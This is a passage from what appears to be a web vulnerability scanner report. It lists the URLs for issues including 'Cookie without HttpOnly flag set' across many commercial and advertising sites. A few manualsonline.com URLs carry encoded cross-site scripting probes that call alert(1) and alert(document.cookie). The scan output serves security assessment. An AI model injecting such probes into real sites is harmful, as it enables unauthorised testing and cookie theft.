14.195. http://www.au2m8.com/v/

14.196. http://www.au2m8.com/v/

14.197. http://www.au2m8.com/v/

14.198. http://www.au2m8.com/v/

14.199. http://www.au2m8.com/v/

14.200. http://www.au2m8.com/v/

14.201. http://www.au2m8.com/v/

14.202. http://www.au2m8.com/v/

14.203. http://www.au2m8.com/v/

14.204. http://www.au2m8.com/v/

14.205. http://www.au2m8.com/v/

14.206. http://www.au2m8.com/v/

14.207. http://www.au2m8.com/v/

14.208. http://www.au2m8.com/v/

14.209. http://www.au2m8.com/v/

14.210. http://www.au2m8.com/v/

14.211. http://www.au2m8.com/v/

14.212. http://www.au2m8.com/v/

14.213. http://www.au2m8.com/v/

14.214. http://www.au2m8.com/v/

14.215. http://www.au2m8.com/v/

14.216. http://www.au2m8.com/v/

14.217. http://www.au2m8.com/v/

14.218. http://www.au2m8.com/v/

14.219. http://www.au2m8.com/v/

14.220. http://www.au2m8.com/v/

14.221. http://www.au2m8.com/v/

14.222. http://www.au2m8.com/v/

14.223. http://www.au2m8.com/v/

14.224. http://www.au2m8.com/v/

14.225. http://www.au2m8.com/v/

14.226. http://www.au2m8.com/v/

14.227. http://www.au2m8.com/v/

14.228. http://www.au2m8.com/v/

14.229. http://www.au2m8.com/v/

14.230. http://www.au2m8.com/v/

14.231. http://www.au2m8.com/v/

14.232. http://www.au2m8.com/v/

14.233. http://www.au2m8.com/v/

14.234. http://www.au2m8.com/v/

14.235. http://www.au2m8.com/v/index.php

14.236. http://www.au2m8.com/v/index.php

14.237. http://www.care2.com/news/

14.238. http://www.cisco.com/ipj/

14.239. http://www.cisco.com/warp/public/707/newsflash.html

14.240. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

14.241. http://www.facebook.com/

14.242. http://www.facebook.com/BlackBerry

14.243. http://www.facebook.com/BlackBerryES

14.244. http://www.facebook.com/BlackBerryFR

14.245. http://www.facebook.com/BlackBerryNL

14.246. http://www.facebook.com/BlackBerryUK

14.247. http://www.facebook.com/BlackBerryZA

14.248. http://www.facebook.com/Craig.Marshall.Deutschland

14.249. http://www.facebook.com/ajouli1

14.250. http://www.facebook.com/americanexpress

14.251. http://www.facebook.com/campaign/impression.php

14.252. http://www.facebook.com/campaign/landing.php

14.253. http://www.facebook.com/dcmoncayo

14.254. http://www.facebook.com/fabianomorige

14.255. http://www.facebook.com/laprincesita.inigulable

14.256. http://www.facebook.com/marytere.medina

14.257. http://www.facebook.com/pages/Kledyde/344540630304

14.258. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

14.259. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

14.260. http://www.facebook.com/pages/OwnerIQ/54446991004

14.261. http://www.facebook.com/pages/Tipd/39630264367

14.262. http://www.facebook.com/pointeresortsaz

14.263. http://www.facebook.com/search/

14.264. http://www.facebook.com/uschi.eller

14.265. http://www.facebook.com/vibrantmedia

14.266. http://www.forexyard.com/css/quotes-chart.cssbdb85

14.267. http://www.godaddy.com/default.aspx

14.268. http://www.linkedin.com/

14.269. http://www.linkedin.com/companies/222438/OwnerIQ

14.270. http://www.linkedin.com/groupInvitation

14.271. http://www.live.com/

14.272. http://www.livejournal.com/

14.273. http://www.mybloglog.com/links/

14.274. http://www.newsvine.com/

14.275. http://www.nmworkwear.de/

14.276. http://www.nmworkwear.de/index.php

14.277. http://www.officedepot.com/

14.278. http://www.officedepot.com/promo/list5.do

14.279. http://www.plurk.com/

14.280. http://www.protopage.com/

14.281. http://www.reddit.com/

14.282. http://www.retrevo.com/support/HP-W8000-Desktops-manual/id/3823ag123/t/2

14.283. http://www.splunk.com/download

14.284. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

14.285. http://www.traffictrack.de/tracking/mpr.php

14.286. http://www.tuenti.com/

14.287. http://www.wtp101.com/pixel

14.288. http://www.yigg.de/

14.289. http://www.youtube.com/americanexpress

14.290. http://www.youtube.com/embed/208T0-OLXA8

14.291. http://www.youtube.com/embed/5aWd_-x1oPE

14.292. http://www.youtube.com/watch

14.293. http://www.zanox-affiliate.de/tpv/

14.294. https://www134.americanexpress.com/consumertravel/travel.do

14.295. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

14.296. http://www201.americanexpress.com/business-credit-cards/

14.297. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

14.298. http://www201.americanexpress.com/business-credit-cards/business-credit-cards

14.299. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

14.300. http://www201.americanexpress.com/business-credit-cards/find-business-credit-cards

14.301. http://www201.americanexpress.com/business-credit-cards/see-all-business-credit-cards

14.302. http://www201.americanexpress.com/getthecard/

14.303. http://www201.americanexpress.com/getthecard/home

14.304. https://www201.americanexpress.com/MobileWeb/index.jsp

14.305. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

14.306. https://www217.americanexpress.com/cards/home.do

14.307. https://www217.americanexpress.com/cards/shopping/index.jsp

14.308. http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806

14.309. http://yasnide.ivwbox.de/blank.gif

14.310. http://yasnide.ivwbox.de/cgi-bin/ivw/CP/hp-ano

14.311. http://ypn-js.overture.com/

14.312. http://zap.mookie1.com/1/vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}@x90

14.313. http://zh-hans.splunk.com/

14.314. http://zh-hant.splunk.com/

14.315. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21695681395940

14.316. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21706094634719

14.317. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s29366180438082

15. Cookie without HttpOnly flag set

15.1. http://66.29.38.208/log.jsp

15.2. http://about.americanexpress.com/cr/

15.3. http://ads.adxpose.com/ads/impression.js

15.4. http://appdeveloper.intel.com/en-us/join

15.5. https://axptravel.americanexpress.com/consumertravel/travel.do

15.6. http://baselinemag.us.intellitxt.com/

15.7. http://blog.vibrantmedia.com/

15.8. http://channelmarketing.owneriq.com/rmb-account/login-page

15.9. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

15.10. http://corp.americanexpress.com/gcs/cards/

15.11. http://corp.americanexpress.com/gcs/cards/land/compare.aspx

15.12. http://dailyme.com/

15.13. http://download32.us.intellitxt.com/

15.14. http://ecal.forexpros.com/e_cal.php

15.15. http://etfdb.com/

15.16. http://event.adxpose.com/event.flow

15.17. http://funp.com/

15.18. http://getclicky.com/106253

15.19. http://hellotxt.com/

15.20. http://hhonors1.hilton.com/en_US/hh/home_index.do

15.21. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

15.22. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

15.23. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

15.24. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

15.25. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

15.26. http://homeappliance.manualsonline.com/managemystuff.html

15.27. http://homeappliance.manualsonline.com/proxy.class.php

15.28. http://homeappliance.manualsonline.com/regman/login/loginForm

15.29. http://homeappliance.manualsonline.com/regman/user/getUserBlock

15.30. http://homeappliance.manualsonline.com/regman/user/validateUser

15.31. http://identi.ca/

15.32. http://imera.com.br/

15.33. http://info.bisk.com/MCIndex.asp

15.34. http://intellitxt.com/opt_out/ch_optout.asp

15.35. http://internetmailmanager.com/s/svrg.asp

15.36. http://live.activeconversion.com/webtracker/track.html

15.37. http://live.activeconversion.com/webtracker/track2.html

15.38. http://lovely-faces.com/index.php

15.39. http://mad4milk.net/

15.40. http://multiply.com/

15.41. http://newstrust.net/

15.42. https://online.americanexpress.com/myca/acctsumm/us/action

15.43. https://online.americanexpress.com/myca/logon/us/action

15.44. http://opensource.org/licenses/lgpl-license.php

15.45. http://opensource.org/licenses/mit-license.php

15.46. http://pdfdatabase.com/search/malayalam-kochupusthakam-free-download.html

15.47. http://phonefavs.com/

15.48. http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

15.49. http://ping.fm/

15.50. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

15.51. http://session.owneriq.net/regman/mem/initsession

15.52. http://software.intel.com/en-us/articles/intel-cloud-builders/

15.53. http://software.intel.com/sites/oss/

15.54. http://sphinn.com/

15.55. https://splunk.webex.com/mw0305l/mywebex/default.do

15.56. http://splunkbase.splunk.com/

15.57. http://starpulse.us.intellitxt.com/intellitxt/switch.asp

15.58. http://t.mookie1.com/t/v1/clk

15.59. http://t2.trackalyzer.com/trackalyze.asp

15.60. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

15.61. http://technorati.com/

15.62. http://tipd.com/

15.63. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

15.64. http://twitter.com/

15.65. http://twitter.com/ORTHOSuperSite

15.66. http://twitter.com/VibrantMedia

15.67. http://twitter.com/owneriq

15.68. http://twitter.com/search/users

15.69. http://twitter.com/share

15.70. http://twitter.com/tipd

15.71. http://unalog.com/

15.72. http://us.blackberry.com/developers/*

15.73. http://www.360macedonia.com/macedonia/mk/sonovnik.php

15.74. http://www.ad4mat.de/ads/conbanner_bild1.php

15.75. http://www.amazon.com/

15.76. http://www.americanexpressfhr.com/

15.77. http://www.baselinemag.com/

15.78. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

15.79. http://www.baselinemag.com/googlecse.html

15.80. http://www.bebo.com/

15.81. http://www.beckerortho.com/

15.82. http://www.bibsonomy.org/

15.83. https://www.blackberry.com/profile/

15.84. http://www.bookmarks.fr/

15.85. http://www.breitband-anbieter.com/

15.86. http://www.breitband-anbieter.com/news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/

15.87. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

15.88. http://www.coe.gatech.edu/

15.89. http://www.diigo.com/

15.90. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

15.91. http://www.download32.com/

15.92. http://www.download32.com/nslookup-software.html

15.93. http://www.download32.com/resources/calendar.css

15.94. http://www.download32.com/resources/calendar.js

15.95. http://www.ebooklibs.com/

15.96. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/

15.97. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/

15.98. http://www.eweek.com/c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/

15.99. http://www.eweek.com/c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/

15.100. http://www.eweek.com/c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/

15.101. http://www.eweek.com/c/s/Videos/

15.102. http://www.filetransit.com/files.php

15.103. http://www.folkd.com/

15.104. http://www.foxitsoftware.com/

15.105. http://www.gabbr.com/

15.106. http://www.gpg.org/

15.107. http://www.hemidemi.com/

15.108. http://www.jamespot.com/

15.109. http://www.jazdtech.com/techdirect/

15.110. http://www.jazdtech.com/techdirect/content/download.htm

15.111. http://www.jazdtech.com/techdirect/lg/logImpressions.htm

15.112. http://www.jumptags.com/

15.113. http://www.linkatopia.com/

15.114. http://www.linkedin.com/

15.115. http://www.linkedin.com/companies/222438/OwnerIQ

15.116. http://www.linkedin.com/groupInvitation

15.117. http://www.lovely-faces.com/

15.118. http://www.manualsonline.com/privacy.html

15.119. http://www.manualsonline.com/tc.html

15.120. http://www.merapakistan.com/directory/draw_list_prize_bond_draw_result_7500.html

15.121. http://www.migrationexpertzone.com/

15.122. http://www.mindbodygreen.com/

15.123. http://www.mister-wong.com/

15.124. http://www.mylinkvault.com/

15.125. http://www.myspace.com/

15.126. http://www.netlog.com/

15.127. http://www.netvouz.com/

15.128. http://www.oandp.com/

15.129. http://www.officedepot.com/

15.130. http://www.officedepot.com/promo/list5.do

15.131. http://www.oit.gatech.edu/content/information-security/

15.132. http://www.oit.gatech.edu/service/software-distribution/software-distribution

15.133. http://www.oneview.de/

15.134. http://www.opensource.org/licenses

15.135. http://www.opensource.org/licenses/gpl-license.php

15.136. http://www.opensource.org/licenses/mit-license.php

15.137. http://www.orthougm.com/nslookup.html

15.138. http://www.othawaii.com/default.asp

15.139. http://www.pdfforge.org/

15.140. http://www.pointehilton.com/

15.141. http://www.pusha.se/

15.142. http://www.retrevo.com/support/HP-W8000-Desktops-manual/id/3823ag123/t/2

15.143. http://www.slackinc.com/privacypolicy.asp

15.144. https://www.slackinc.com/reprints/order.asp

15.145. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp

15.146. https://www.slackinc.com/subscribe/newsubs/otistep1.asp

15.147. http://www.smartertechnology.com/c/s/Tools/

15.148. http://www.splunk.com/cave/narc.php

15.149. http://www.startaid.com/

15.150. http://www.stumpedia.com/

15.151. http://www.sulit.com.ph/index.php/view

15.152. http://www.symbaloo.com/

15.153. http://www.tarifcheck24.com/

15.154. http://www.technotizie.it/

15.155. http://www.usbjd.org/

15.156. http://www.viadeo.com/

15.157. http://www.vibrantmedia.co.uk/

15.158. http://www.vibrantmedia.com/about/board.asp

15.159. http://www.vibrantmedia.com/about/index.asp

15.160. http://www.vibrantmedia.com/whatisIntelliTXT.asp

15.161. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

15.162. http://www.webnews.de/

15.163. http://www.wechseln.de/

15.164. http://www.widgetbox.com/widget/bookmarks-kledyde

15.165. http://www.xerpi.com/

15.166. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

15.167. http://www1.hilton.com/en_US/hi/index.do

15.168. http://www201.americanexpress.com/business-credit-cards/

15.169. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

15.170. http://www201.americanexpress.com/business-credit-cards/business-credit-cards

15.171. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

15.172. http://www201.americanexpress.com/business-credit-cards/find-business-credit-cards

15.173. http://www201.americanexpress.com/business-credit-cards/see-all-business-credit-cards

15.174. http://www201.americanexpress.com/getthecard/

15.175. http://www201.americanexpress.com/getthecard/home

15.176. https://www201.americanexpress.com/MobileWeb/index.jsp

15.177. https://www209.americanexpress.com/merchant/marketing-data/pages/home

15.178. https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms

15.179. https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends

15.180. http://www212.americanexpress.com/dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do

15.181. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

15.182. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do

15.183. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

15.184. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

15.185. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do

15.186. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

15.187. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do

15.188. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do

15.189. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do

15.190. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalsavings.do

15.191. https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do

15.192. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

15.193. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

15.194. https://www257.americanexpress.com/openhome/smallbusiness.do

15.195. https://www295.americanexpress.com/entertainmentaccess/home.do

15.196. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

15.197. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

15.198. http://zh-hans.splunk.com/cave/narc.php

15.199. http://zh-hant.splunk.com/cave/narc.php

15.200. http://a.rfihub.com/ca.gif

15.201. http://a.tribalfusion.com/i.cid

15.202. http://a.tribalfusion.com/j.ad

15.203. http://about.americanexpress.com/

15.204. http://about.americanexpress.com/sm/

15.205. http://action.media6degrees.com/orbserv/hbpix

15.206. http://ad.doubleclick.net/click

15.207. http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html

15.208. http://ad.doubleclick.net/clk

15.209. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11

15.210. http://ad.yieldmanager.com/pixel

15.211. http://ad.yieldmanager.com/unpixel

15.212. http://ad.zanox.com/ppv/

15.213. http://ad.zanox.com/tpv/

15.214. http://adclick.g.doubleclick.net/aclk

15.215. http://ak1.abmr.net/is/us.blackberry.com

15.216. http://altfarm.mediaplex.com/ad/ck/14302-119028-23636-2

15.217. http://altfarm.mediaplex.com/ad/ck/9700-118565-26469-2

15.218. http://altfarm.mediaplex.com/ad/js/14302-119028-23636-2

15.219. http://altfarm.mediaplex.com/ad/nc/14302-119028-23636-2

15.220. http://amch.questionmarket.com/adsc/d852910/8/40051907/decide.php

15.221. http://ar.voicefive.com/b/wc_beacon.pli

15.222. http://ar.voicefive.com/bmx3/broker.pli

15.223. http://au2m8.com/

15.224. http://b.scorecardresearch.com/b

15.225. http://b.scorecardresearch.com/p

15.226. http://b.voicefive.com/b

15.227. http://baselinemag.us.intellitxt.com/al.asp

15.228. http://baselinemag.us.intellitxt.com/intellitxt/front.asp

15.229. http://blogmarks.net/

15.230. http://blogs.splunk.com/

15.231. http://bookmarks.yahoo.com/

15.232. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

15.233. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

15.234. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.235. http://buzz.yahoo.com/

15.236. http://buzzport.gatech.edu/

15.237. http://c03.adsummos.net/a/e/d1.ads

15.238. http://c03.adsummos.net/a/e/s21719

15.239. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

15.240. http://clk.redcated/229/go/253329229/direct

15.241. http://clk.redcated/MRT/go/258547606/direct/01/

15.242. http://clk.redcated/MRT/go/264255445/direct

15.243. http://clk.redcated/MRT/go/267859374/direct

15.244. http://clk.redcated/go/264255445/direct

15.245. http://clk.redcated/go/267859374/direct

15.246. http://corp.americanexpress.com/gcs/travel/us/

15.247. http://counter.yadro.ru/hit

15.248. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xNzk2NjkwL3QvMg/cat/267859374-193167493/qry/

15.249. http://del.icio.us/post

15.250. http://delicious.com/

15.251. http://developer.yahoo.com/yui/

15.252. http://developer.yahoo.com/yui/license.html

15.253. http://developers.facebook.com/plugins/

15.254. http://digg.com/

15.255. http://digg.com/submit

15.256. http://download32.us.intellitxt.com/al.asp

15.257. http://download32.us.intellitxt.com/intellitxt/front.asp

15.258. http://dslshop.vodafone.de/eshop/pv/97444194

15.259. http://eas.statcamp.net/eas

15.260. http://edge.quantserve.com/quant.js

15.261. http://eisenstein.dk/loader/qt.php

15.262. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

15.263. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

15.264. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s29905151680577

15.265. http://friendfeed.com/

15.266. http://fusion.google.com/add

15.267. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

15.268. http://hiltonworldwide1.hilton.com/en_US/ww/customersupport/privacy-policy.do

15.269. https://home.americanexpress.com/home/corporations.shtml

15.270. https://home.americanexpress.com/home/global_splash.html

15.271. https://home.americanexpress.com/home/mt_personal.shtml

15.272. http://i.w55c.net/rs

15.273. http://idcs.interclick.com/Segment.aspx

15.274. http://idpix.media6degrees.com/orbserv/hbpix

15.275. http://imp.constantcontact.com/imp/cmp.jsp

15.276. http://imp.constantcontact.com/imp/cmp.jsp

15.277. http://info.riministreet.com/50percentsavings.html

15.278. http://lct.salesforce.com/

15.279. https://lct.salesforce.com/

15.280. http://leadback.advertising.com/adcedge/lb

15.281. http://load.exelator.com/load/

15.282. http://map.media6degrees.com/orbserv/hbpix

15.283. http://messenger.yahoo.com/

15.284. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461

15.285. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

15.286. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

15.287. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp

15.288. http://mittwiki.ivwbox.de/blank.gif

15.289. http://mittwiki.ivwbox.de/cgi-bin/ivw/CP/blog

15.290. http://mm.chitika.net/minimall

15.291. http://mm.chitika.net/track

15.292. http://msdn.microsoft.com/en-us/library/ms537509(VS.85

15.293. http://myweb2.search.yahoo.com/myresults/bookmarklet

15.294. http://orthoinfo.aaos.org/

15.295. http://owneriq.postaffiliatepro.com/scripts/track.php

15.296. http://pixel.33across.com/ps/

15.297. http://pixel.intellitxt.com/pixel.jsp

15.298. http://pixel.quantserve.com/pixel

15.299. http://px.owneriq.net/cm

15.300. http://px.owneriq.net/oxcm

15.301. http://px.owneriq.net/p

15.302. http://qooxdoo.org/

15.303. http://quotes.forexyard.com/quotes2.js

15.304. http://rt32.infolinks.com/action/doq.htm

15.305. http://rt82.infolinks.com/action/doq.htm

15.306. http://rt83.infolinks.com/action/doq.htm

15.307. https://sb.voicefive.com/b

15.308. http://segment-pixel.invitemedia.com/pixel

15.309. http://sourceforge.net/projects/winscp/

15.310. http://splunkbase.splunk.com/account:session/

15.311. http://spongecell.com/api/widgets/clickthrough/263365

15.312. http://statse.webtrendslive.com/dcsjpsizt10000o69qvsmy5ls_9m8u/dcs.gif

15.313. http://survey.questionmarket.com/noauth/ktag_log.php

15.314. http://tags.bluekai.com/site/2956

15.315. http://tools.cisco.com/search/display

15.316. http://track2.mybloglog.com/js/jsserv.php

15.317. http://tracker.icerocket.com/services/gatherer.php

15.318. http://tracker.icerocket.com/services/gatherer.php

15.319. http://tracker.icerocket.com/services/gatherer.php

15.320. http://tracker.icerocket.com/services/gatherer.php

15.321. http://tracker.icerocket.com/services/gatherer.php

15.322. http://tracker.icerocket.com/services/gatherer.php

15.323. http://tracker.icerocket.com/services/gatherer.php

15.324. http://tracker.icerocket.com/services/gatherer.php

15.325. http://tracker.icerocket.com/services/gatherer.php

15.326. http://tracker.icerocket.com/services/gatherer.php

15.327. http://tweetmeme.com/story/3866851775/

15.328. http://us.blackberry.com/assets_refresh/images/dropNavArrow.png

15.329. http://vegetarian.about.com/od/soupsstewsandchili/r/hotandsour.htm

15.330. http://whitepixel.com/backend/remote/

15.331. http://www.active-srv02.de/werbemittel/WebObjects/werbemittel.woa/wa/ads

15.332. http://www.addthis.com/bookmark.php

15.333. http://www.alistapart.com/articles/taminglists/

15.334. https://www.americanexpress.com/airlines-credit-card/

15.335. https://www.americanexpress.com/credit-card-rewards/

15.336. https://www.americanexpress.com/gift/giftcardslanding.shtml

15.337. https://www.americanexpress.com/gold-card/

15.338. https://www.americanexpress.com/no-annual-fee-credit-cards/

15.339. http://www.au2m8.com/favicon.ico

15.340. http://www.au2m8.com/v/

15.341. http://www.au2m8.com/v/

15.342. http://www.au2m8.com/v/

15.343. http://www.au2m8.com/v/

15.344. http://www.au2m8.com/v/

15.345. http://www.au2m8.com/v/

15.346. http://www.au2m8.com/v/

15.347. http://www.au2m8.com/v/

15.348. http://www.au2m8.com/v/

15.349. http://www.au2m8.com/v/

15.350. http://www.au2m8.com/v/

15.351. http://www.au2m8.com/v/

15.352. http://www.au2m8.com/v/

15.353. http://www.au2m8.com/v/

15.354. http://www.au2m8.com/v/

15.355. http://www.au2m8.com/v/

15.356. http://www.au2m8.com/v/

15.357. http://www.au2m8.com/v/

15.358. http://www.au2m8.com/v/

15.359. http://www.au2m8.com/v/

15.360. http://www.au2m8.com/v/

15.361. http://www.au2m8.com/v/

15.362. http://www.au2m8.com/v/

15.363. http://www.au2m8.com/v/

15.364. http://www.au2m8.com/v/

15.365. http://www.au2m8.com/v/

15.366. http://www.au2m8.com/v/

15.367. http://www.au2m8.com/v/

15.368. http://www.au2m8.com/v/

15.369. http://www.au2m8.com/v/

15.370. http://www.au2m8.com/v/

15.371. http://www.au2m8.com/v/

15.372. http://www.au2m8.com/v/

15.373. http://www.au2m8.com/v/

15.374. http://www.au2m8.com/v/

15.375. http://www.au2m8.com/v/

15.376. http://www.au2m8.com/v/

15.377. http://www.au2m8.com/v/

15.378. http://www.au2m8.com/v/

15.379. http://www.au2m8.com/v/

15.380. http://www.au2m8.com/v/

15.381. http://www.au2m8.com/v/

15.382. http://www.au2m8.com/v/

15.383. http://www.au2m8.com/v/

15.384. http://www.au2m8.com/v/

15.385. http://www.au2m8.com/v/

15.386. http://www.au2m8.com/v/

15.387. http://www.au2m8.com/v/

15.388. http://www.au2m8.com/v/

15.389. http://www.au2m8.com/v/

15.390. http://www.au2m8.com/v/

15.391. http://www.au2m8.com/v/

15.392. http://www.au2m8.com/v/

15.393. http://www.au2m8.com/v/

15.394. http://www.au2m8.com/v/

15.395. http://www.au2m8.com/v/

15.396. http://www.au2m8.com/v/

15.397. http://www.au2m8.com/v/

15.398. http://www.au2m8.com/v/

15.399. http://www.au2m8.com/v/

15.400. http://www.au2m8.com/v/

15.401. http://www.au2m8.com/v/

15.402. http://www.au2m8.com/v/

15.403. http://www.au2m8.com/v/

15.404. http://www.au2m8.com/v/

15.405. http://www.au2m8.com/v/

15.406. http://www.au2m8.com/v/

15.407. http://www.au2m8.com/v/

15.408. http://www.au2m8.com/v/

15.409. http://www.au2m8.com/v/

15.410. http://www.au2m8.com/v/

15.411. http://www.au2m8.com/v/

15.412. http://www.au2m8.com/v/

15.413. http://www.au2m8.com/v/

15.414. http://www.au2m8.com/v/

15.415. http://www.au2m8.com/v/

15.416. http://www.au2m8.com/v/

15.417. http://www.au2m8.com/v/

15.418. http://www.au2m8.com/v/

15.419. http://www.au2m8.com/v/

15.420. http://www.au2m8.com/v/

15.421. http://www.au2m8.com/v/

15.422. http://www.au2m8.com/v/

15.423. http://www.au2m8.com/v/

15.424. http://www.au2m8.com/v/

15.425. http://www.au2m8.com/v/

15.426. http://www.au2m8.com/v/

15.427. http://www.au2m8.com/v/

15.428. http://www.au2m8.com/v/

15.429. http://www.au2m8.com/v/

15.430. http://www.au2m8.com/v/index.php

15.431. http://www.au2m8.com/v/index.php

15.432. https://www.blackberry.com/partnerzone/Forward.action

15.433. https://www.blackberry.com/partnerzone/Login.action

15.434. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

15.435. https://www.box.net/

15.436. http://www.care2.com/news/

15.437. http://www.cisco.com/ipj/

